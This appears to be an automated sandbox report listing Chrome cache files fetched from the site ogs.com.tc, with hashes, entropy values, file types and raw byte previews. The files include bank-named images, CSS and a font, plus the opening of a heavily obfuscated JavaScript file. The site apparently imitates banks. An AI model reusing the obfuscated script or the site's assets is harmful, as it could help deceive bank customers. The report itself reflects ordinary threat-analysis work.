    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):4528
    Entropy (8bit):7.936942161113379
    Encrypted:false
    SSDEEP:96:eM0ww3WpqYkXJnPUlwdFKoN8FSz2gDi/8:eM0l3Wp7oJPgwdFdNeSzZDj
    MD5:7D37026130C2A0B269BD4F9C165FAD7F
    SHA1:F53514C0D1A2F644CB6DB4FFADF0167FEC4413BF
    SHA-256:008B64ADB48FE137B0210B3187450B8804FB291D5283E794E2EAE52E05D61720
    SHA-512:C8FA453082068ED27DFEFA878997B30D8420FD053C5F3616A36DC6B2824493D403662F92EFD64248E1F10F58225E41EEE60A420C6C6D40E3814DC800F16E55AA
    Malicious:false
    Reputation:low
    Preview:RIFF....WEBPVP8 ....0^...*....>I$.E..!...T(....p.T...y.U..~!.s....,.o..k>..@y.~..u...........7..P....z.=.?h=3.d~..l.......d....C.?..t~..[..LP~;.....f.#>..c.../.....w................o.>...{..(.g.c.w.o./........g.3....\.........+.............../.k.s..P....w.....w.....w.....w.....w.....w.....w.....w..e..5.r...;..r...;}.bo.>S........~.....F..p.I...;AT....+.M"Gz..uG..7W.n3..T.G1.....2..D.G..PI\.,..](./.!..z.T..D.....3.@....obLH\o....9..l.]b...#..e.}.S....2K..?c..........=ey.U.E.!._7u.....9D..eZ..'.:..\.6iE.^..m?T.......,..D..2=....%V.K....~...5.`....52..D<l...#..2...d.N..8.n.F....\..%..=.'.O~5.D..!..*...R.......U.....N....I...QjCV..`..._.1..IOb.yg~....F..Q.:..wJ....%....Uy..0..w...!...@wf....;..r...;..r...;..r...;..r...;..r...;..r...;p...............$.e....q..5O..M.nf.Ap."..8....l...7.....1....c..[...A4FD,.+.f..(....Of.Oj...&Y....5....{.^...)...i.<.F...r.A....y..%(.....4H.{|.%.A...T./.le. 9*..U|.B].......J...KE.s.....A....A..c..&..$..y.tL=.Z.Z

    Chrome Cache Entry: 80

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with very long lines (65524), with no line terminators
    Category:downloaded
    Size (bytes):165489
    Entropy (8bit):4.895905755805124
    Encrypted:false
    SSDEEP:3072:XJrHFOPPvJUnk/wWHdAyMpQ82U/ddzqHu/u6olnPJsEWx:5HFOPP2nk4WHdAyMpQ82U/dcHu1olnPM
    MD5:5AA332B5891E11EC6C0CEEF84E83BA21
    SHA1:6199B80DE81251C61234C9532C4FD6F55A44E148
    SHA-256:9EA5DE183CB4E7BBFD327D5D5283553F323E60E149BD3EBEE310E81C5EDA500E
    SHA-512:07F3603FE16F93E726E18C7B52A06C05D95C2B63C1DCF9B9D865A1317DC3872DE97EAEF5F6F99EDEB6CBBD4A24409C5E73C44B9B8977F9AD3E8805D16B0182BE
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/js/script.js
    Preview:function _0x29df51(_0x4c6bf7,_0x38d0cc,_0x554698,_0x35fecc,_0x451cec){return _0x289a(_0x38d0cc-0x78,_0x35fecc);}(function(_0x4b75be,_0xdaf1f){function _0x290509(_0x5f37cb,_0x24d899,_0x2a7be0,_0xbd5a04,_0x56171a){return _0x289a(_0x2a7be0- -0x287,_0xbd5a04);}var _0x5d7e12=_0x4b75be();function _0x177763(_0x4fecaa,_0x4521df,_0x39ddff,_0x4fd340,_0x215640){return _0x289a(_0x4fecaa- -0x178,_0x39ddff);}function _0x268e1f(_0x1a0aca,_0x50daa1,_0x511ca7,_0xfa7961,_0x5b6738){return _0x289a(_0x50daa1-0x3c0,_0x1a0aca);}function _0x3dbc17(_0xa1b0b3,_0x36025e,_0x3e7102,_0x5b2be4,_0x94654f){return _0x289a(_0x36025e-0x52,_0x3e7102);}function _0x3f5229(_0x1bdd95,_0x45f948,_0x4a8863,_0x518c9d,_0x4e3394){return _0x289a(_0x45f948- -0x1f9,_0x4a8863);}while(!![]){try{var _0x46e0bb=parseInt(_0x3dbc17(0x444,0x31b,0x283,0x190,0x1d1))/(0xc6a+-0x1*-0x1f39+-0x2ba2)*(parseInt(_0x3dbc17(0x28f,0x227,0x31d,0x1da,0x329))/(0x430+-0xaca+-0x9*-0xbc))+parseInt(_0x177763(0xa1,0x14,0xae,0x1be,0x180))/(-0x32e+-0x6aa*0x2+-0x108

    Chrome Cache Entry: 81

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):5774
    Entropy (8bit):7.955781932195618
    Encrypted:false
    SSDEEP:96:AyFOrILQx/1XU3fpnSws4st9BG1bshnP8Jk6jf3o6f6VA6bSEf0h2lI2UO3ANANd:jUcL0/1cpnOb4shnP8W43nLEf0h+UO35
    MD5:7995B5E53599897563011D13AA49EA5F
    SHA1:F56C2F94BFB6CD60D11D278E0FBEAC6703590E72
    SHA-256:D51FF84F13144F25DDC1DAF353E519C9541EC6BE63DA2C25FB3868112064AF32
    SHA-512:459E1E81B58EBB0C5A8B6C17938AFC8B906F1A6CCE51C17BD5A38A929C4AAD548465AC7C3F1B804AD484FA4C6BECE01EBCB786E947BFD624E6969C41623AD429
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/deniz.jpg
    Preview:RIFF....WEBPVP8 z....h...*....>I".E..!.X|.(....p.......W...j......t.i...w`....?.v..{..O......`/...?...~..;.......+.......s?..?....u.~.{..........N.......s.........~>x..W.{......./4..}t./.o...vx..+...O.....|.......N.]....{=....Z.7....*......#........<.~w._...?.....?..{.....o.....3.... &.{w/C.n..a...=.....r.0..^.......z.{w/C.n..a...=.....o..t.. ..LHd.B.....*$.2.M.,..3...sn...>C..............p|<>.....>....j.$.__....z..1..q......~9..).G.8..."F.^#...I....#.kyk%"....tyg..".E>.....E." iV...~;..sC..!..!.4.!....as.c.$cx.....j../..n.......J.=.$..b.C.t9..qp&..Vd...;.Xl.v^ZV{...7...p.[.".oJ..3.{W.A...Q.t.<..(..2N..k.*U..."C.N."#.......Bir..."%..0j...w.r...[....%.>..w......n,......OF..4V... .K...:...u.y1.7....n..ue..`^Br....f...-.4.G<...1=..Z.7D.A&fi...v.2.M.j>..;3.O..k......z.zB...n..a...=.....r.0..^.......z.{w/C.n..a...=.x................x_.....jt..S.e.ch.2.enu........).-@..^..)..f.?..N.m..>..E...f...t0R..bh5........[..-....x..CG.(}.S.p+=Y.b.~.

    Chrome Cache Entry: 82

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:28 03:31:15], progressive, precision 8, 500x200, components 3
    Category:dropped
    Size (bytes):36954
    Entropy (8bit):7.6584790869372155
    Encrypted:false
    SSDEEP:768:zcoO/xcoGHVKZnU+ytlJjIWlBc86nXHgGbikavTDupeJMKK:zcoUcoGHw1/y3lLLCgGuhDTMJ
    MD5:55EAC6447192DC06174FFD6FC925B12C
    SHA1:EB34EA301401FDAAE5C50D52E2F11934738E98F5
    SHA-256:652F9B7EF8CD5A0C66CB112CE2B7EB8EA7F9332D13552C7E82E9C7E5F532E075
    SHA-512:54A0E0B2D0A1AC3F154DDBFFCBE366C0EA38A0BB6E2F84CC7EE30B2248DBDF0039C7C43B5D88DBA5C8F7A15EE8D986D25F74BDCE0B275B0C815EA5357DE825BD
    Malicious:false
    Reputation:low
    Preview:.....{Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:28 03:31:15........................................................................."...........*.(.....................2...........A.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)ef}`.....i...........[.........P....rG."..*...g.d....1M...N.N..s.$.9.e..pi<....=[1.......v2.6.....

    Chrome Cache Entry: 83

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:SVG Scalable Vector Graphics image
    Category:downloaded
    Size (bytes):8746
    Entropy (8bit):3.948607010097119
    Encrypted:false
    SSDEEP:192:Ww8o3Nd5aQk6tjbzOt1SSVZ7u5esh07S01XxnUF:W+3rMCjGt1SSHMesG7D1hnUF
    MD5:E5743937C99F16C9355FAEB1F0F43747
    SHA1:FBC44E8BB5CFD1C55FC7D04B844802B772C197B7
    SHA-256:39966EC7EEA8F508184CEF9F98895A0E8D74E3328A43CC8A93C528CFCA888691
    SHA-512:4A948D98FAD13E2DEFE50BAD24B6A681E79C6A0C6FB373AAF87B37F167B9AA25B51A305E79690B6865DDE80547AADD6A5A06704553AC0F716E878243071C8ADF
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/edkkds.svg
    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 672.5 100"><path fill="#E6E6E6" d="M86.1 26.4c-.1-1-.9-2-2-2.3l-38.3-13c-.6-.2-1.4-.2-2.1 0l-38.4 13c-1 .3-1.9 1.2-2 2.3C.6 52.5 5 72.3 16.8 85.5 28.9 98.7 44 99.8 44.7 99.8h.4c.6 0 15.8-1 27.8-14.3C84.6 72.3 89 52.4 86.1 26.4z"/><path fill="#FFF" d="M87.2 17.1c-.1-1.1-.9-2.2-2-2.5L46.1.4c-.6-.2-1.4-.2-2.1 0L4.8 14.6c-1 .3-1.9 1.3-2 2.5-3 28.5 1.5 50 13.6 64.2C28.7 95.8 44.1 97 44.8 97h.4c.6 0 16.1-1.1 28.4-15.6 12-14.3 16.6-36 13.6-64.3z"/><path fill="#EA212E" d="M82.2 20.2c-.1-1-.8-1.9-1.7-2.2L45.6 5.4c-.5-.2-1.3-.2-1.8 0L9 18c-.9.3-1.6 1.2-1.7 2.2-2.7 25.3 1.3 44.4 12 57.1C30.2 90.2 44 91.2 44.5 91.2h.4c.5 0 14.3-1 25.2-13.8 10.7-12.8 14.7-32 12.1-57.2zM31.2 82c-.5-.3-.8-.5-1.3-.8 9.3-2 16.9-5.9 23.8-10.1-6.2 4.1-13.8 8.3-22.5 10.9zm44.7-42.7c-1.3 2.8-2.7 5.1-4.5 7.5-3.6 4.5-7.8 8.2-12.6 11.5-4.8 3.4-10 6.3-15.6 8.8-2.7 1.2-5.8 2.4-9.2 3.2-3.1.8-7.1 1.6-10.7.8-1.4-.3-2.6-.6-3.6-1.3-1.2-1.9-2.2-4-3.1-6.2.1-2.7 1.5-5.1 2.7-7.1 3.1-4

    Chrome Cache Entry: 84

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):6232
    Entropy (8bit):7.9601543548667015
    Encrypted:false
    SSDEEP:96:e5cUySaDRnAHjREcke1qe0zapt0dTHv0UxWcgv3O6j+lp7LDSvwVt0Cj:McU05A9EckcREapWPgHqlpHjsC
    MD5:23F8245CA4B48852594FD42621DA538E
    SHA1:64CE65DD304712ACCA99110878FACF125CFC029B
    SHA-256:DC1AB0A4FBEF32DF24A561823E09CFD394CB1486BBCF4D5C74981FD74E039010
    SHA-512:83FE7186C65E72D10C80892FAEC68341525E376E6758261C34F31B395D89C85CA12033B2ECD6BAE583CFA9FA69EC055A8B88D594536C6B75F7CFA384AA82E568
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/finans.jpg
    Preview:RIFFP...WEBPVP8 D...Pi...*....>I$.E..!.L..(....p...o.{J...m...4..<.....v.2..z......I....................u...yo~../.e...k.9..YC._...|(...9./..#{/.5...<..A...?.j.3?........_.?.?*..~.r*.O.........2>.{..,.......^....*...G.o......3..}=.W...O.......K...............7.A.*]."....$.R.9.U..y%..|.....(T...EU.d.IB.f.T.[K...../<..R..S.<,l$"....#.:..v..&....\sch...\.%.Avlb..h^.$.+.2....7o.....g.....!.<0kp.Z]..@1NbF........<.N.u.Qk',.#..3....aq.IHP...rM&..]....\sj........<...BM....u."!xs.^.V`>.."=RMe.U..t...%4R(.....9.q.S..m.h...p..Ii..p.{TNU.1c.M.'...Z..6!...........NC]..ERh~....c.U_....q...*.....A7.(....E...9..dM=n.7"...^z..6fb....u.t...M3...V...8..t .p.'.OM9,......:.q.Y...b.7......(3.....Y.u.Z....L~.EQxR.........y..h.6.E....<QB.J.3.O...i.,.........>_..W..*.`...y%..@.(....7..8#.^..7.5.U..y%..|.....(T...EU.d.IB..8r*.. .J....U_...P.........Ox.7..&.;W.g..^qcy.gU...e....D...K.1R~yn..L........Ik}....ij...Wq&=e.T+...M.>0M..3......V.....y..K..^.#......

    Chrome Cache Entry: 85

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:PNG image data, 165 x 40, 8-bit colormap, interlaced
    Category:downloaded
    Size (bytes):2220
    Entropy (8bit):7.8303895814946145
    Encrypted:false
    SSDEEP:48:3YniT3/OGVBWNNr5Ko9HRoOcqAfuvQubCdcjYEvvcl8J4D8DbSEz:j2GfWNNpmq6uYcFnc+WDo
    MD5:FDAC5F9234036C2502CEE52C30F7774B
    SHA1:CD24A9F757055E2EF598BE0D164934C6A1B4E3CD
    SHA-256:473F0D637169B8B400874FFB0C487DFC5F4BC544E8BFEBE98502A6A5CEB781E7
    SHA-512:6353199AB3414FE3D72BF07359D54B3D74D9B02153F0495D38E99EC3BD5BDAB3415425C0BDA4612388409194948D9E1E137D6F7FD5E76497ACC698AD22237C6D
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/1.png
    Preview:.PNG........IHDR.......(........x....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.................xy.oo.ij.de...........ef.....................ML.(".SS.|}.TT..........0,.$...........VW.JJ......)....HH.....52....QR.75.....&......%..uu.......3/.......{|.......ff..........................rr..?=...................B@.YY....,'.~........2...........`a....+&.......:8.FF.......DD.......[[.y{....;9....]^....kl.......z{....(!.=;........................d..\....bKGD....H....tIME.......:.+.....IDATX..Xi[.I..@...D.#.W&.....D0.A ....4.gb...o..^......CwuOMQ.U]]=D..N.W9.~}h..'.D..:.<uQ.p.4.%.A.G.k...D...<.|....fck.J@Ty.|.f..B. .I5..(...[...47Q.....1..bUk.Z.z].......s5|^....o..9N...+V...6,..\.0Do..Y..@n{...#.qiN3..!*(...[@r.3x..../.M....Wc....a}..Y..c....X=.....].qo.,p.....8.).M..]1......\......q.....(Ay........B8PB.%...P?B....."...#.Y.S`.|.=..]..0Y.F..n.`......r.v...,<..&.`6j.@..B. /.K...c..=l..4.....Kr.l....z...L.}....m...N.q.&..@..^...L.E

    Chrome Cache Entry: 86

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:28 01:56:02], progressive, precision 8, 500x200, components 3
    Category:downloaded
    Size (bytes):33055
    Entropy (8bit):7.604025581526417
    Encrypted:false
    SSDEEP:768:VMns/70MnsMerq/Sf9nTKl8sHM7JE3jtOAVe24HEd+:OnMTnsMer7VnTuHM7JajKR
    MD5:6B6D6494A2D5FE6292641588AF2FF231
    SHA1:D4D82A589A1E71A4C917B0AFC0267BAC3C672480
    SHA-256:C521F96B7435290FD70825A2D5E45A10DC3789FEFD0D98851F72330C1D6F7A11
    SHA-512:31E4C7B87A5D90EF6A419B6A56A2BDE528E1C9368C713F1FB87A16333FF77C021BF1874B5BB74939175D46454810452582081ADB0FD5A11D6BA8844F4C5714E8
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/hsbc.jpg
    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:28 01:56:02........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJIgY.....].C..o-u..Q.rT..7........Y...C.=....f..7?.d.?.7........Y...K.s}]...,o.u..$8..}...o.S...N.J..T.....&....n..'...Y..p7...(..1=..I$.B.I$...I

    Chrome Cache Entry: 87

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
    Category:downloaded
    Size (bytes):48236
    Entropy (8bit):7.994912604882335
    Encrypted:true
    SSDEEP:768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
    MD5:015C126A3520C9A8F6A27979D0266E96
    SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
    SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
    SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
    Malicious:false
    Reputation:low
    URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
    Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.

    Chrome Cache Entry: 88

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:PNG image data, 196 x 196, 8-bit/color RGBA, interlaced
    Category:dropped
    Size (bytes):38550
    Entropy (8bit):7.976146059619022
    Encrypted:false
    SSDEEP:768:WfsaAn77REMI0/oHfogxTtPbRk/NQ5QgKeAsL9NQl/y2Z5tQzb57:WfsaA/REMIYoHf5BtNWgU+QB/5a7
    MD5:3290DEB61511EEE631E455D4D4C421CD
    SHA1:44C7B59E98A30682100ECE6C8672715F3CFDE979
    SHA-256:CB0374314E49BE2700C9F7C6C59BE3248D2658CC0F426FAED041928712B26475
    SHA-512:E92A89601EEC2916AE04AAA2C0CB82B4E141023E0A5E61BA74A67C8A38B237BF168FDEC13A324487E599D04D4E133D5D5DC9CE1EBA0052EA33924F96F9902DD5
    Malicious:false
    Reputation:low
    Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...yx.......g..B..B$aMX............\.T..p........7@....*.AD.T.T.}..$.d2......e.{.{z.......d....S.N...c"..........gVIW...gj..3.Fl{`R...|=.... 0........,..&..a.U....H.*._Ie..T._../$...""2.C{ Z|..Qd.N*./"..1...d.........1......L..!"..kn O..DDT.N......W.....k...=V..o.=...T^.....H.pB..E..FO..0...e*(B.nD7.9..B!.0O....D.0.4...@..l..)r.cT..{.....0.(..W..}.....^D.w.G.2.(G...#...^|..@7h...d=...|.N..."*o.^#..........IDT.PTFFF..nu.j..|y.......".**.@S.X.|...W\.c.......W*J%".$)T^PH...@....A....SYA...9r......,..B?.....*.c2.H..h.G..0..3.)?l.....e.MMI..Y.*o.V....j.....$.z.....O.FE.E.....$I.)I.)......A.\*....i.!......`.....Bv}4....Ah..(.s*....[.I......6.8........"W..G.g.8.......1.....w^o.4..>..._Zr....@d....(.....8.R..o.}...f .QR....x..`.I...T..KDD?......0!.8._........=....p..P.BN.do^.A..r...ce..e.(Mp.`.A...>...[..I;5..-.oL...".i)D.S

    Chrome Cache Entry: 89

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):4050
    Entropy (8bit):7.9449549923866
    Encrypted:false
    SSDEEP:96:I6zgu0J3Vwy7fD47SdIsVr4EEAzvpUg2yUR6g9qQV2kHEVdisb:IOg5D9k/S5dlURL92Fmsb
    MD5:C9D61E6409128B3B695DA5D0F577709D
    SHA1:DF9F6B72F626A34E1A0F7C5E09198616CD055DC6
    SHA-256:4C353EB3748F302E18D210A9AB7CC1BA7E1B28A7357E038782E4E7A88088547A
    SHA-512:4587B9784B632CDC4AF5427F7E6B735957BF1EF06FDC0B40F6ED3CD45F57E047A07C168072211A835272C703EB6AD4B841A49CB311B2B7B74DEB44A1B409D07D
    Malicious:false
    Reputation:low
    Preview:RIFF....WEBPVP8 .....U...*....>I$.F".!.!...P..en.v....}...~Z{*U?..........<..K..._.?(...n......O...G.....<..9.....w......q.................[...;.....o.o.o....._.?.~...u..k..j?..$..|..g0'......a...Ey......@.....}..8.+.w.....~5.B...o.....c..-.O.....0...w..h_..f/.`.\Z..`9.e......0..2..Nmv..n.|..6.yL.7..AS.]....._ ...S.../.P.7g.0 %.........D5.sp...9...`9.........,f....7....(.G..6.q...&..."!...........H..0.u,X.Y$..U.....<dy. .ZR.E|5..=..g......L.6....D'#.!..P.R~..B....M.x...[M.#....-B...:..7...W..@.hm>N...zW.~.@.PT3.Y........&.. ... D..p...'....{...|.[,.n..6.%..k..D.H........<&....a.N.Z..#T....3..*....2sC......./".S.C.C...%AS.]....._ ...S.../.T..o)....*sk...sp...9...`9.e......0..2............a..?......1.P...I=N....4...N...........J..h.....V..~.,.0...GD.i.......R.a.."..>..p2...O^S...........@.l.W..sC..O.X.Qh....I..0..b&...jS{.LA.|/G......w.t8.....O..Y9c..C.!7....b1|%9r.2*:..p...rxK.^V.t._0.....p.R._..............i$..K.p....2..[_..l....)..A)r.Vq

    Chrome Cache Entry: 90

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 20:19:27], progressive, precision 8, 500x200, components 3
    Category:dropped
    Size (bytes):36270
    Entropy (8bit):7.647087471913715
    Encrypted:false
    SSDEEP:768:dDL/CDMGJ4x2yom4g9v4aWZYZDPnNrCmgZH6AtBF:di4GJfdNgNpWZYXrFgZ7
    MD5:DFF21D4248FC2A0B6B34A0D108B9121A
    SHA1:E52B06B2F5C7379AE46751B399A10E53425C02D4
    SHA-256:599A24CF29AB06D972A5C2E4386F21051D3B78B27F93B9306EB3FFCC71263B94
    SHA-512:132754CF24C1485608CB61747782B680D8C0DA34DDCDB5229DEC03CE7B647B82840B76D768BFD7BE3BD73C7A8B2B91604851C78A890AE748D13487B1133A8BEC
    Malicious:false
    Reputation:low
    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 20:19:27........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.@.........\bO.G.s......Vm..6C_i..8......).$..L.$v.>..W.Y.L.$b7....f.I$..I$.J....T.I%)$.IJIQ..k..;r)..m.a.fCZ...^......

    Chrome Cache Entry: 91

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):5774
    Entropy (8bit):7.955781932195618
    Encrypted:false
    SSDEEP:96:AyFOrILQx/1XU3fpnSws4st9BG1bshnP8Jk6jf3o6f6VA6bSEf0h2lI2UO3ANANd:jUcL0/1cpnOb4shnP8W43nLEf0h+UO35
    MD5:7995B5E53599897563011D13AA49EA5F
    SHA1:F56C2F94BFB6CD60D11D278E0FBEAC6703590E72
    SHA-256:D51FF84F13144F25DDC1DAF353E519C9541EC6BE63DA2C25FB3868112064AF32
    SHA-512:459E1E81B58EBB0C5A8B6C17938AFC8B906F1A6CCE51C17BD5A38A929C4AAD548465AC7C3F1B804AD484FA4C6BECE01EBCB786E947BFD624E6969C41623AD429
    Malicious:false
    Reputation:low
    Preview:RIFF....WEBPVP8 z....h...*....>I".E..!.X|.(....p.......W...j......t.i...w`....?.v..{..O......`/...?...~..;.......+.......s?..?....u.~.{..........N.......s.........~>x..W.{......./4..}t./.o...vx..+...O.....|.......N.]....{=....Z.7....*......#........<.~w._...?.....?..{.....o.....3.... &.{w/C.n..a...=.....r.0..^.......z.{w/C.n..a...=.....o..t.. ..LHd.B.....*$.2.M.,..3...sn...>C..............p|<>.....>....j.$.__....z..1..q......~9..).G.8..."F.^#...I....#.kyk%"....tyg..".E>.....E." iV...~;..sC..!..!.4.!....as.c.$cx.....j../..n.......J.=.$..b.C.t9..qp&..Vd...;.Xl.v^ZV{...7...p.[.".oJ..3.{W.A...Q.t.<..(..2N..k.*U..."C.N."#.......Bir..."%..0j...w.r...[....%.>..w......n,......OF..4V... .K...:...u.y1.7....n..ue..`^Br....f...-.4.G<...1=..Z.7D.A&fi...v.2.M.j>..;3.O..k......z.zB...n..a...=.....r.0..^.......z.{w/C.n..a...=.x................x_.....jt..S.e.ch.2.enu........).-@..^..)..f.?..N.m..>..E...f...t0R..bh5........[..-....x..CG.(}.S.p+=Y.b.~.

    Chrome Cache Entry: 92

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with CRLF, CR line terminators
    Category:downloaded
    Size (bytes):149508
    Entropy (8bit):4.885874065110497
    Encrypted:false
    SSDEEP:768:QYHQn2GNJe/26vJf1UqpxQ9pxfdp8a/XX5XFOGXAH/ko:QYHQreuoXQ93fd6ffko
    MD5:86C9289DC8A13C80F14CE626D5774002
    SHA1:F2FC238DF4D4AF5C1469046DE573AD6BF32D3B5A
    SHA-256:91DF9CADDE6F62D90F4D002BF15BEB40C67FF55938B829956044B4524CDA0773
    SHA-512:6C629D9D658FE1850917C8B8A946376641EDC16C466192EB1495B9E1DD09B142AD83612506148B3FD9EDFA96429620839D5692315D4B788D7B72CAB7A8F1ECCF
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/css/style.css
    Preview:@import url('https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap');..@import url('https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@100;200;300;400;500;600;700;800;900&display=swap');....* {.. -webkit-font-smoothing: antialiased;.. -moz-osx-font-smoothing: grayscale;.. text-rendering: optimizeLegibility;.. text-shadow: rgba(0, 0, 0, .01) 0 0 1px..}....input::-webkit-outer-spin-button,..input::-webkit-inner-spin-button {.. -webkit-appearance: none;.. margin: 0;..}....input[type=number] {.. -moz-appearance: textfield;.. -webkit-appearance: textfield;.. appearance: textfield;..}....body#ROOT {.. width: 100%..}....select:focus,..input:focus,..button:focus,..textarea:focus {.. outline: 0;..}....a,..button {.. cursor: pointer;..}....body#ROOT:after,..body#ROOT:before {.. content: "";.. display: table..}....body#ROOT:after {.. clear: both..}.....st

    Chrome Cache Entry: 93

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):4414
    Entropy (8bit):7.945095559581274
    Encrypted:false
    SSDEEP:96:YMZwRS+gvHuw7q1stqv9hCHvMd6c6gpilgoKwxUKr2/0C:YMGRS+gvHl7WsalDiObwuQ2Z
    MD5:D1306EE481D42E8B5C9BEDC7912750BD
    SHA1:69280F12C5A71880B049D64CCA44B99AACAF6DC3
    SHA-256:C005BB0A1E17FD46685CFFF945353975BDAC012D5F487BE9C3BFFE1C08F02FB0
